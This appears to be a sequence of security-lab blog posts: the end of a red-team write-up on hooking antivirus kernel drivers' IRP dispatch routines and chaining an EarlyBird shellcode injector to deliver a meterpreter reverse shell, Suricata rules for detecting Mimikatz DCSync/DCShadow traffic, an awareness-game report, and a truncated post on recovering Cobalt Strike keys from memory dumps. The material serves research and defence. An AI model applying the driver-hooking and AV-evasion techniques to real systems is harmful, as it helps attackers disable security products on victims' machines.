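The naming convention described above can be illustrated with a short user-mode Python sketch. The function name and the example path are hypothetical. As noted, the result is only a guess at the object name, since a driver is free to pick a different one.

```python
from pathlib import PureWindowsPath


def guess_driver_object_name(image_path: str) -> str:
    """Derive a candidate \\Driver\\<name> object name from the driver's file name on disk."""
    # stem drops the directory part and the .sys extension
    return "\\Driver\\" + PureWindowsPath(image_path).stem
```

Note that the returned Python string contains single backslashes. The doubled backslashes shown earlier are how the same name is written inside a C/C++ string literal.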

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    // DeviceObject is used below to look up the hooked driver, so it is not marked unreferenced
    auto stack = IoGetCurrentIrpStackLocation(Irp);
    auto status = STATUS_UNSUCCESSFUL;
    KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
        return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
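}

void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
    for (int i = 0; i < MaxIntercept; i++) {
        if (globals.Drivers[i].DriverObject == DriverObject) {
            // call the target driver's original unload routine, if it has one
            if (globals.Drivers[i].DriverUnload) {
                globals.Drivers[i].DriverUnload(DriverObject);
            }
            // restore the original routines and free the slot
            UnhookDriver(i);
            return;
        }
    }
    // only reached when the driver being unloaded is not in the hooked drivers array
    NT_ASSERT(false);
}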
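
The save, replace and restore logic behind this hooking approach can be modelled in user mode. The following Python sketch is a conceptual model only, not kernel code and not Interceptor's implementation: the class, function and variable names are hypothetical. The 64-slot limit mirrors the limit mentioned for Interceptor, and the table size follows IRP_MJ_MAXIMUM_FUNCTION (0x1b) from the WDK headers.

```python
IRP_MJ_MAXIMUM_FUNCTION = 0x1B  # highest major function code in the WDK headers
MAX_INTERCEPT = 64              # number of slots in the hooked drivers array


class DriverModel:
    """Stand-in for a DRIVER_OBJECT with its MajorFunction dispatch table."""

    def __init__(self, name, handler):
        self.name = name
        self.major_function = [handler] * (IRP_MJ_MAXIMUM_FUNCTION + 1)


hooked = [None] * MAX_INTERCEPT  # each used slot holds (driver, original table)
intercepted = []                 # log of intercepted calls, replaces the debug print


def intercept_dispatch(driver, major, irp):
    """Log the call, then forward it to the saved original routine."""
    intercepted.append((driver.name, major))
    for slot in hooked:
        if slot is not None and slot[0] is driver:
            return slot[1][major](driver, major, irp)
    return "STATUS_UNSUCCESSFUL"


def hook_driver(driver):
    """Save the original table in a free slot and point every entry at the interceptor."""
    for index, slot in enumerate(hooked):
        if slot is None:
            hooked[index] = (driver, list(driver.major_function))
            driver.major_function = [intercept_dispatch] * len(driver.major_function)
            return index
    raise RuntimeError("no free slot in hooked drivers array")


def unhook_driver(index):
    """Restore the original table and free the slot."""
    driver, originals = hooked[index]
    driver.major_function = originals
    hooked[index] = None
```

In this model, a call through a hooked table is logged first and then reaches the original routine, and unhooking puts the saved table back so later calls bypass the interceptor.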

4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck, mimikatz.exe was still detected and blocked. This got me thinking, running such a well-known malicious binary without any attempts to hide it or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I chose a shellcode injector using:

  • the EarlyBird code injection technique
  • PPID spoofing
  • Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
  • Direct system calls to bypass any user mode hooks

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load-, registry- and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Detecting DCSync and DCShadow Network Traffic

15 November 2021 at 08:30

This blog post on detecting Mimikatz’ DCSync and DCShadow network traffic accompanies the SANS webinar “Detecting DCSync and DCShadow Network Traffic”.

Intro

Mimikatz provides two commands to interact with a Windows Domain Controller and extract or alter data from the Active Directory database.

These two commands are dcsync and dcshadow.

The dcsync command can be used, on any Windows machine, to connect to a domain controller and read data from AD, like dumping all credentials. This is not an exploit or privilege escalation: the necessary credentials are required to be able to do this, for example a golden ticket.

The dcshadow command can be used, on any Windows machine, to connect to a domain controller and write data to AD, like changing a password or adding a user. This too is not an exploit or privilege escalation: proper domain admin credentials are necessary to achieve this.

Both commands rely on the active directory data replication protocol: Directory Replication Service (DRS). This is a protocol (MSRPC / DCE/RPC based) that domain controllers use to replicate their AD database changes between them. The Microsoft API for DRS is DRSUAPI.

Such traffic should only occur between domain controllers. When DRS traffic is detected between a DC and a non-DC (a user workstation for example), alarms should go off.

Alerting

An Intrusion Detection System can detect DRSUAPI traffic with proper rules.

Figure 1: IDS inspecting traffic between workstation and DC

The IDS needs to be positioned inside the network, at a location where traffic between domain controllers and non-domain controllers can be inspected.

DCE/RPC traffic is complex to parse properly. For example, remote procedure calls are done with an integer that identifies the procedure to call. The name of the function, represented as a string for example, is not used in the DCE/RPC protocol. Furthermore, function integers are only unique within an interface: for example, function 0 is the DsBind function in the DRSUAPI interface, but function 0 is also the DSAPrepareScript function in the DSAOP interface.

A very abstract view of such traffic can be represented like this:

Figure 2: abstraction of DCE/RPC traffic

If an IDS would just see or inspect packet B, it would not be able to determine which function is called. Sure, it is function 0, but for which API? Is it DsBind in the DRSUAPI API or is it DSAPrepareScript in the DSAOP interface? Or another one …

So, the IDS needs to keep track of the interfaces that are requested, and then it can correctly determine which functions are requested.
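
The ambiguity can be illustrated with a minimal Python sketch. The lookup table below contains only the two functions named above, and the helper name resolve is purely illustrative; it is not part of any IDS.

```python
# Opnum-to-name tables, one per interface. Only the two entries mentioned
# in the text are filled in; this is an illustration, not a complete table.
FUNCTIONS = {
    "DRSUAPI": {0: "DsBind"},
    "DSAOP": {0: "DSAPrepareScript"},
}


def resolve(interface, opnum):
    """Return the function name for an opnum, or None without context."""
    if interface is None:
        # Packet B seen in isolation: the opnum alone is ambiguous.
        return None
    return FUNCTIONS.get(interface, {}).get(opnum)


print(resolve(None, 0))       # no interface known, cannot be resolved
print(resolve("DRSUAPI", 0))  # resolved thanks to the earlier bind
print(resolve("DSAOP", 0))    # same opnum, different function
```

Only once the interface requested in packet A is remembered does opnum 0 in packet B map to a single function.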

Alerting dcsync

Here is captured dcsync network traffic, visualized with Wireshark (dcerpc display filter):

Figure 3: DCSync network traffic

Frame 28 is our packet A: requesting the DRSUAPI interface

Frame 41 is our packet B: requesting function DsGetNCChanges

Notice that these packets do belong to the same TCP connection (stream 4).

Thus, a rule would be required that triggers on two different packets. This is not possible with a single simple rule in Snort/Suricata: simple rules inspect only one packet.

What is typically done in Suricata for such cases, is to make two rules: one for packet A and one for packet B. And an alert is only generated when rule B triggers after rule A triggers.

This can be done with a flowbit. A flowbit is literally a bit kept in memory by Suricata, that can be set or cleared.

These bits are linked to a flow. Simply put, a flow is a set of packets between the same client and server. It’s more generic than a connection.

Thus, what needs to be done to detect dcsync traffic using a flowbit, is to have two rules:

  1. Rule 1: detect packet of type A and set flowbit
  2. Rule 2: detect packet of type B and alert if flowbit is set
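
The two-rule logic can be sketched in a few lines of Python. This is a simplified model and not how Suricata is implemented: the class FlowBits, the function inspect, the flow identifiers and the abstract packet types "A" and "B" are all assumptions made for illustration.

```python
class FlowBits:
    """Per-flow named bits, loosely modelled on the flowbit idea above."""

    def __init__(self):
        self._bits = {}  # flow id -> set of bit names

    def set(self, flow, name):
        self._bits.setdefault(flow, set()).add(name)

    def isset(self, flow, name):
        return name in self._bits.get(flow, set())


def inspect(flowbits, flow, packet_type):
    """Return True when an alert should be raised for this packet."""
    if packet_type == "A":
        # Rule 1: remember that packet A was seen, but do not alert.
        flowbits.set(flow, "drsuapi")
        return False
    if packet_type == "B":
        # Rule 2: alert only if rule 1 fired earlier on the same flow.
        return flowbits.isset(flow, "drsuapi")
    return False


fb = FlowBits()
print(inspect(fb, "flow-1", "B"))  # B without a preceding A: no alert
print(inspect(fb, "flow-1", "A"))  # A sets the bit silently
print(inspect(fb, "flow-1", "B"))  # B after A on the same flow: alert
```

Because the bit is stored per flow, a packet of type B on a different flow does not raise an alert.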

Suricata rules that implement such a detection, look like this:

alert tcp $WORKSTATIONS any -> $DCS any (
msg:"Mimikatz DRSUAPI"; 
flow:established,to_server; 
content:"|05 00 0b|"; depth:3; 
content:"|35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2|"; depth:100; 
flowbits:set,drsuapi; 
flowbits:noalert; 
reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000010; rev:1;)

alert tcp $WORKSTATIONS any -> $DCS any (
msg:"Mimikatz DRSUAPI DsGetNCChanges Request";
flow:established,to_server;
flowbits:isset,drsuapi; 
content:"|05 00 00|"; depth:3; 
content:"|03 00|"; offset:22; depth:2;
reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000011; rev:1;)

The first rule (Mimikatz DRSUAPI) is designed to identify a DCERPC Bind to the DRSUAPI API. The packet data has to start with 05 00 0B:

Figure 4: DCERPC packet header

5 is the major version of the protocol, 0 is the minor version, and 0B (11 decimal) is a Bind request.

A UUID is used to identify the DRSUAPI interface (this is not done with a string like DRSUAPI, but with a UUID that uniquely identifies the DRSUAPI interface):

Figure 5: DRSUAPI UUID

The UUID for DRSUAPI is

e3514235-4b06-11d1-ab04-00c04fc2dcd2

In network packet format, it is

35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2.
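
The conversion between both notations can be checked with Python's standard uuid module, whose bytes_le attribute stores the first three UUID fields in little-endian order and the remaining bytes unchanged. The variable names are illustrative.

```python
import uuid

DRSUAPI_UUID = uuid.UUID("e3514235-4b06-11d1-ab04-00c04fc2dcd2")

# bytes_le: the first three fields are little-endian, the rest is kept as-is
wire = DRSUAPI_UUID.bytes_le
print(" ".join(f"{b:02x}" for b in wire))
# prints: 35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2
```

This is the byte sequence used in the second content clause of the first rule.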

When both content clauses are true, the rule triggers. The action that is triggered, is setting a flowbit named drsuapi:

flowbits:set,drsuapi;

A second action, is to prevent the rule from generating an alert when setting this flowbit:

flowbits:noalert;

This explains the first rule.

The second rule (Mimikatz DRSUAPI DsGetNCChanges Request) is designed to detect packets with a DRSUAPI request for function DsGetNCChanges. The packet data has to start with 05 00 00:

Figure 6: DRSUAPI Request

5 is the major version of the protocol, 0 is the minor version, and 00 is an RPC request.

And further down in the packet data (position 22 to be precise) the number of the function is specified:

Figure 6: DRSUAPI DsGetNCChanges

Number 3 is DRSUAPI function DsGetNCChanges.

When flowbit drsuapi is set and both content clauses are true, the rule triggers.

flowbits:isset,drsuapi;

And an alert is generated.

Notice that the rule names contain the word Mimikatz, but these rules are not specific to Mimikatz: they will also trigger on regular replication traffic between DCs. The key to use these rules properly, is to make them inspect network traffic between domain controllers and non-domain controllers. Replication traffic should only occur between DCs.

Alerting dcshadow

Mimikatz dcshadow command also generates DRSUAPI network traffic, and the rules defined for dcsync also trigger on dcshadow traffic.

One lab in SANS training SEC599, Defeating Advanced Adversaries – Purple Team Tactics & Kill Chain Defenses, covers dcsync and its network traffic detection. If you take this training, you can also try out dcshadow in this lab.

The dcshadow command requires two instances of Mimikatz to run. First, one running as system to setup the RPC server:

Figure 7: first instance of Mimikatz for dcshadow (screenshot a)
Figure 8: first instance of Mimikatz for dcshadow (screenshot b)

And a second one running as domain admin to start the replication:

Figure 9: second instance of Mimikatz for dcshadow

This push instruction starts the replication:

Figure 10: second instance of Mimikatz for dcshadow (screenshot b)

dcshadow network traffic looks like this in Wireshark (dcerpc display filter):

Figure 11: dcshadow network traffic

Notice the DRSUAPI bind requests and the DsGetNCChanges requests -> these will trigger the dcsync rules.

DRSUAPI_REPLICA_ADD is also an interesting function to detect: it adds a replication source. The integer that identifies this function is 5.

Figure 12: DRSUAPI_REPLICA_ADD

A rule to detect this function can be created based on the rule to detect DsGetNCChanges.

What needs to be changed:

  1. The opnum: 03 00 -> 05 00
  2. The rule number, sid:1000011 -> sid:1000014 (for example)
  3. And the rule message (preferably): “Mimikatz DRSUAPI DsGetNCChanges Request” -> “Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request”

alert tcp $WORKSTATIONS any -> $DCS any (
msg:"Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request";
flow:established,to_server;
flowbits:isset,drsuapi; 
content:"|05 00 00|"; depth:3; 
content:"|05 00|"; offset:22; depth:2;
reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000014; rev:1;)

More generic rules

It is also possible to change the flowbit setting rule (rule for packet A), to generate alerts. This is done by removing the following clause:

flowbits:noalert;

Alerts are generated whenever the DRSUAPI interface is bound to, regardless of which function is called.

And a generic rule for a DRSUAPI function call can also be created, by removing the following clause from the DsGetNCChanges rule (for example):

content:"|03 00|"; offset:22; depth:2;

Byte order and DCERPC

DCERPC is a flexible protocol, that allows different byte orders. A byte order, is the order in which bytes are transmitted over the network. When dealing with integers that are encoded using more than one byte, for example, different orders are possible.

The opnum detected in the dcsync rule, is 3. This integer is encoded with 2 bytes: a most significant byte (00) and a least significant byte (03).

When the byte order is little-endian, the least significant byte (03) is transmitted first, followed by the most significant byte (00). This is what is present in the captured network traffic.

But when the byte order is big-endian, the most significant byte (00) is transmitted first, followed by the least significant byte (03).

And thus, the rules would not trigger for big-endian byte-order.

The byte order is specified by the client in the data representation bytes of the DCERPC packet data:

Figure 13: DCERPC data representation

If the first nibble of the first byte of the data representation is one, the byte order is little-endian.

Big-endian is encoded with nibble value zero.
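
As an illustration, here is a minimal Python sketch of byte-order-aware opnum extraction. It assumes that the buffer starts at the beginning of a DCERPC version 5.0 PDU and that the data representation starts at offset 4; the function name request_opnum is hypothetical.

```python
import struct

PTYPE_REQUEST = 0x00


def request_opnum(data):
    """Return the opnum of a DCERPC 5.0 request PDU, or None."""
    if len(data) < 24:
        return None
    if data[0] != 5 or data[1] != 0 or data[2] != PTYPE_REQUEST:
        return None
    # First nibble of the first data representation byte (offset 4):
    # 1 means little-endian, 0 means big-endian.
    nibble = data[4] >> 4
    if nibble == 1:
        fmt = "<H"
    elif nibble == 0:
        fmt = ">H"
    else:
        return None
    # The opnum is a 2-byte integer at offset 22.
    return struct.unpack_from(fmt, data, 22)[0]


# Synthetic headers: only the fields used above carry meaningful values.
little = bytes([5, 0, 0, 3, 0x10, 0, 0, 0]) + bytes(14) + b"\x03\x00"
big = bytes([5, 0, 0, 3, 0x00, 0, 0, 0]) + bytes(14) + b"\x00\x03"
print(request_opnum(little), request_opnum(big))
```

Both synthetic packets yield opnum 3, although the two opnum bytes are transmitted in opposite order.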

We have developed rules that check the byte-order, and match the opnum value accordingly:

alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x10,4; byte_test:1,<=,0x11,4; content:"|03 00|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000012; rev:1;)
alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x00,4; byte_test:1,<=,0x01,4; content:"|00 03|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000013; rev:1;)

alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x10,4; byte_test:1,<=,0x11,4; content:"|05 00|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000015; rev:1;)
alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x00,4; byte_test:1,<=,0x01,4; content:"|00 05|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000016; rev:1;)

Notice that Suricata and Snort can also be configured to enable the dcerpc preprocessor. This allows for the creation of rules that don’t have to take implementation details into account, like byte-order:

alert dcerpc $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; dce_iface:e3514235-4b06-11d1-ab04-00c04fc2dcd2; dce_opnum:3; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000017; rev:1;)

But such rules can have a significantly higher performance impact, because of the extra processing performed by the dcerpc preprocessor.

Conclusion

In this blog post we show how to detect Active Directory replication network traffic. Such traffic is normal between domain controllers, but it should not be detected between a non-domain controller (like a workstation or a member server) and a domain controller. The presence of unexpected DRS traffic is a strong indication of an ongoing Active Directory attack, like Mimikatz’ DCSync or DCShadow.

The rules we start with operate at a low network layer level (TCP data), but we show how to develop rules at a higher level, that are more versatile and require less attention to implementation details.

Finally, the rules presented in this blog post are alerting rules for a detection system. But they can easily be modified into blocking rules for a prevention system, by replacing the alert action by a drop or reject action.

All the rules presented here can also be found on our IDS rules Github repository.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Another spin to Gamification: how we used Gather.town to build a (great!) Cyber Security Game

9 November 2021 at 08:33
CSI Game hosted on Gather.town platform

Let’s recap October. Cyber Security Awareness Month. For a cyber awareness enthusiast, it is hard to conceal the excitement that comes with a full month of initiatives in all shapes and sizes, built around a genuine and strong effort to help keep companies and their people “safe online”. At NVISO also, the buzz is tangible, and everyone is eager to know what great projects we will be launching for this year’s Cyber Security Awareness Month. We’re lucky enough to have a client who will go the extra mile and allowed us to let our imagination run wild. And that is exactly what we did.

Let’s make it: “a game”

Our assignment was simple, yet challenging:

  • Define a scenario that fits a “Security at Home” context, where we connect our security tips to a “working from home” context
  • Make something fun out of the everyday security challenges we face in our day-to-day life, at home. Basically, challenges that should be familiar for any player. Not to teach something new, but to reinforce existing awareness as a main goal.
  • Set up a digital experience that allowed people working remotely to collaborate smoothly in a team, and to compete against each other in teams.

Gamification being all the rage, there are quite a few options out there, some of which we’ve tested and used for projects in the past. Think online Cyber Escape Games (even a full-size escape truck), scavenger hunts, online quizzes, e-learnings, … You name it. However, none of these fully fitted the brief.

A match made in…

Gather.town logo

Inspired by the CSCBE 2021 event, successfully hosted remotely through the use of Gather.town, we came up with the idea of creating our own game and dedicated space. An all-in-one solution which is fully customizable and which allows for direct audio and video communication between hosts, players and teams. A match made in cyber awareness heaven? Or too good to be true? Let’s dive into the details.

Concept

As a concept we opted for the well-known schemes of a classic Crime Scene Investigation (CSI) game which has shown to be a successful basis for many legendary series and video games. We came up with a cyber related crime that could fit into the personal and social environment of your average neighbour and created a whole world around it. By world we mean: a location, a family (and pet), a social life, pieces of evidence and of course many irrelevant objects to create some noise ;-). All elements of this fictional world are linked to clearly defined (not so fictional) cyber security topics and lessons.

“The Harris family’s apartment gets robbed in the middle of the night without them noticing.

This is strange, since their newly installed connected alarm system was active and signalled “all clear” when they woke up that morning. The whole family is a bit shaken, and no-one can really explain what happened…​

Turns out their alarm system has been compromised and was turned off to ensure the burglar had easy access.”

Teams signing up for the game will be asked to investigate the crime, in order to be able to answer the main question: “how did it happen?”. Additional questions are asked in the ‘investigation report’ to be able to distinguish between top teams and to allow for the game to be a real competition with final scores and a leader board.

Connecting the dots: tips to create an attractive and usable Gather.town virtual world

To allow for this concept to work in practice, we needed a strong and stable platform that would deliver on both connectivity and experience. That’s where Gather.town comes into play.

Disclaimer: we don’t have any particular business relationship with Gather.town. It’s just that we’ve tested a few platforms, and really liked that particular one.

Designing an attractive map

CSI Game map edition in Tiled

Gather.town consists of a map filled with interactive objects, where your avatar can move around the map and interact with the objects.

First, we needed to create a map that would fulfil our scenario requirements while also being intuitive to walk on for non-gamers. Instead of designing everything from scratch, we used tile sets from the well-known RPG Maker series and adapted them so they could be easily manipulated in an open-source map editing software called Tiled. Using this software, we were able to divide the map into a set of two layers, the foreground and background. This allowed for a more realistic way of moving in the room by giving a perception of depth for the players.

We decided to go for a square and compact room so that people do not get lost easily, and so that everyone could hear each other even from the other side of the map. However, the sky is basically the limit here. Endless options to go crazy. It is however important to note that these kinds of configuration details really do affect the overall user experience and should therefore not be left to chance.

Have the players check out the content of a computer, in the map

As the Gather.town platform is still under development, the number of features available was limited compared to our ambitious game scenario. To increase the range of possible types of interactive objects, we decided to embed a home-made web application to be shown as an iframe in the game. This could be then presented as the content of a computer – for example, the social media profile of a family member, their e-mail inbox, or some Twitter post.

To touch upon the topic of phishing, we created an e-mail inbox (c.f. screenshot below) with four emails that could or could not be phishing. We decided to go with all legitimate emails for each of which an additional piece of evidence was added somewhere in the room. Participants still needed to look for red flags in the emails, but would find justifications for each email during their investigation.

Mailbox of mother Suzy

Another example is a social media account (and privacy settings page) we created for one of the family members to introduce the topic of social engineering. Participants would need to make some links between this profile and testimonials to understand how the burglar used that technique to commit their crime.

To balance the costs and efforts, we decided to go for a frontend application which would simply be hosted on an AWS S3 bucket. The application was made using Vue.js along with Buefy so that we would not have to worry about the design either.

Each interactive item corresponds to a different path in the URL. Having a frontend-only application did not prevent us from building interactive items. Indeed, we implemented a fake login screen which would validate the credentials in the frontend directly. As the players have a limited time to complete the investigation, it is unlikely they will search for the solution in the source code, so we considered we could afford the risk of cheating. However, in general, let’s not consider this as a good practice to validate passwords! 😉

Collecting & processing responses

In order to capture answers to be provided through the investigation report, we used Microsoft Forms (we could not use our web application as it’s a frontend-only one). The great thing about using Microsoft 365 tools is that it allowed us to process the input through a Microsoft Power Automate flow. That way we could already pre-calculate some of the scoring and redirect the output in order to make it easier for the host to preview.

Additionally, we aimed at providing a leader board in real-time and giving the result to the players just after they finish the game for the ultimate game/competition experience. It was a challenge to instantly give the overall score for 11 questions, all having different weights, some even having a negative score. To ease our task, we went for Microsoft SharePoint Lists. They are similar to Excel sheets, but more user friendly as the formatting can be customized and the output is really visual.

Having implemented the above, our game was ready to be played!

Challenges?

As for any online security awareness campaign, there are inherent challenges that we tried to overcome by being as prepared as possible. On our side as well as on the client’s side.

Reaching a broad audience

Let’s get things straight. Gamification is hot. However, don’t expect people to sign-up just because it’s a game you’re offering. Add some “online fatigue” to the mix and you have a real challenge at hand.

Therefore, it is best not to leave things to chance. From what we have experienced, the following points are important:

  • Investing time in a proper communication plan and clearly explain the goal of the exercise (by the way, planning for Cyber Month 2022 starts now!). Also showing the platform: a cool set up, e.g. with a small video walkthrough, will attract attention! Word of mouth advertising can spark the interest of a colleague. Capturing testimonials from happy early joiners and sharing them with everyone can help too.
  • Adding a bit of competition by using leader boards can also motivate people into playing your game. A small prize and a big recognition for the winners always make for effective communication material.

Testing, testing, testing

From the scenario itself to the most technical parts such as the accessibility of the material or the software used for communicating, testing is crucial. Each issue you catch early on is an issue that will not occur during actual game sessions.

How we performed the testing phase:

  • We went for three distinct dry runs, with people from different backgrounds and skills, different teams, and with different computers 😊. Not everyone is used to collaboration tools and games, and dry runs enabled us to identify confusing items and rework them.

We had multiple people in our team running the game, sometimes at the same moment too, so we needed them to operate with a certain degree of autonomy and know how to handle every potential error. We thus thought about the most plausible failure scenarios and prepared a plan B for each of these cases. Documenting those fallback procedures is essential to ensure issues can be tackled rapidly, when in the midst of the action.

Conclusion

At the end of the day, the CSI concept and the use of Gather.town as a dedicated space really lived up to our expectations. Participants had fun creating avatars and indicated they had a great time while reinforcing knowledge on Cyber Security Awareness topics they might have come across in the past… If this is setting the bar for next year, we cannot wait to see what Cyber Security Awareness Month has in store for us!

About the authors

Sophie Madessis is a member of the NVISO Labs team involved in various R&D tasks to support other teams regarding cyber security related projects. Along with performing some security assessments, she likes spending time on automating processes using Power Automate and other Microsoft tools. You can find Sophie on Linkedin.

Hannelore Goffin is a senior consultant within the Cyber Strategy team at NVISO where she is passionate about raising awareness on all cyber related topics, both for the professional and personal context. Next to awareness, Hannelore focuses on third party risk management. You can find Hannelore on Linkedin.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Cobalt Strike: Using Process Memory To Decrypt Traffic – Part 3

3 November 2021 at 19:18

We decrypt Cobalt Strike traffic with cryptographic keys extracted from process memory.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. And in part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In this blog post, we will explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump.

Cobalt Strike network traffic can be decrypted with the proper AES and HMAC keys. In part 2, we obtained these keys by decrypting the metadata with the private RSA key. Another way to obtain the AES and HMAC key, is to extract them from the process memory of an active beacon.

One method to produce a process memory dump of a running beacon, is to use Sysinternals’ tool procdump. A full process memory dump is not required, a dump of all writable process memory is sufficient.
Example of a command to produce a process dump of writable process memory: “procdump.exe -mp 1234”, where -mp is the option to dump writable process memory and 1234 is the process ID of the running beacon. The process dump is stored inside a file with extension .dmp.

For Cobalt Strike version 3 beacons, the unencrypted metadata can often be found in memory by searching for byte sequence 0x0000BEEF. This sequence is the header of the unencrypted metadata. The earlier in the lifespan of a process the process dump is taken, the more likely it is to contain the unencrypted metadata.

Figure 1: binary editor view of metadata in process memory
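
The search itself is simple. The following Python sketch lists every offset at which the byte sequence occurs; it only locates candidates and does not decode the metadata, and the function name and the synthetic sample data are assumptions made for illustration. This is not the code of cs-extract-key.py.

```python
MARKER = bytes.fromhex("0000beef")


def find_marker_offsets(dump, marker=MARKER):
    """Return every offset at which the marker occurs in the dump bytes."""
    offsets = []
    pos = dump.find(marker)
    while pos != -1:
        offsets.append(pos)
        pos = dump.find(marker, pos + 1)
    return offsets


# Synthetic stand-in for the contents of a .dmp file
sample = b"\x11" * 8 + MARKER + b"\x22" * 20 + MARKER + b"\x33" * 4
print(find_marker_offsets(sample))
```

For a real dump, the bytes would be read from the .dmp file in binary mode. Each hit is only a candidate that still has to be decoded and validated.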

Tool cs-extract-key.py can be used to find and decode this metadata, like this:

Figure 2: extracted and decoded metadata

The metadata contains the raw key: 16 random bytes. The AES and HMAC keys are derived from this raw key by calculating the SHA256 value of the raw key. The first half of the SHA256 value is the AES key, and the second half is the HMAC key.

These keys can then be used to decrypt the captured network traffic with tool cs-parse-http-traffic.py, like explained in Part 2.

Remark that tool cs-extract-key.py is likely to produce false positives: namely byte sequences that start with 0x0000BEEF, but are not actual metadata. This is the case for the example in figure 2: the first instance is indeed valid metadata, as it contains a recognizable machine name and username (look at Field: entries). And the AES and HMAC key extracted from that metadata, have also been found at other positions in process memory. But that is not the case for the second instance (no recognizable names, no AES and HMAC keys found at other locations). And thus that is a false positive that must be ignored.

For Cobalt Strike version 4 beacons, it is very rare that the unencrypted metadata can be recovered from process memory. For these beacons, another method can be followed. The AES and HMAC keys can be found in writable process memory, but there is no header that clearly identifies these keys. They are just 16-byte long sequences, without any distinguishable features. To extract these keys, the method consists of performing a kind of dictionary attack. All possible 16-byte long, non-null sequences found in process memory, will be used to try to decrypt a piece of encrypted C2 communication. If the decryption succeeds, a valid key has been found.
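
The candidate enumeration behind such a dictionary attack can be sketched in Python as follows. This is not the implementation of cs-extract-key.py: the function names are hypothetical, "non-null" is interpreted here as "not all zero bytes", and the validity check is passed in as a callback. The demo uses a truncated HMAC-SHA256 tag over made-up data as a stand-in for the real test, which is decrypting captured C2 data.

```python
import hashlib
import hmac


def candidate_keys(dump, size=16):
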